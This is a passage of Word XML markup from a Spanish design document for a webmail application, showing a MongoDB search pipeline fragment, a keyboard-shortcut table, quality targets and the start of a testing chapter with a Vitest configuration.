        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { $meta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'searchScore'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(folderId) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      pipeline[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">compound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        { equals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'folderId'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> value</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ObjectId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(folderId) }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Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">aggregate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(pipeline)</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Atajos de teclado configurados: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Atajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Acción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contexto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">g</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir a INBOX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Global</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Redactar nuevo email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Global</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Responder email seleccionado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vista lectura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reenviar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vista lectura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Archivar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Seleccionar todos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">j</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Navegar siguiente/anterior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lista emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mostrar atajos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Global</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Esc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cerrar modal/vista</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Global</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Validación final:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Lighthouse score &gt; 90 en performance, accesibilidad y best practices. Coverage de tests &gt; 85%. Todos los contenedores saludables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="198"/>
    <w:bookmarkEnd w:id="199"/>
    <w:bookmarkEnd w:id="200"/>
    <w:bookmarkStart w:id="217" w:name="testing-estratégico"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12. Testing Estratégico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El testing de una aplicación de correo presenta desafíos únicos: parsing MIME, sanitización HTML contra XSS, comunicación con servidores IMAP/SMTP y flujos E2E que atraviesan desde el frontend hasta servidores de correo reales. Este capítulo define la estrategia de testing completa para Webmail 6.0, basada en la pirámide de testing con proporción 70/20/10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[295]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="204" w:name="testing-unitario-vitest"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.1 Testing Unitario (Vitest)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vitest es el framework de testing nativo para el ecosistema Vite/Vue 3, ofreciendo soporte integrado de TypeScript, hot module replacement para tests y compatibilidad con la API de Jest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[287]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[303]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La configuración base del monorepo ejecuta Vitest en cada package con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@vitest/coverage-v8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para reportes de cobertura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/vitest.config.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { defineConfig } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'vitest/config'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@vitejs/plugin-vue'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { resolve } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'path'</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plugins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    globals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environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'happy-dom'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src/**/*.test.ts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src/**/*.spec.ts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    coverage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      provider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'v8'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      reporter</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'json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'json-summary'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'html'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      reportsDirectory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./coverage'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      thresholds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        lines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        branches</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statements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
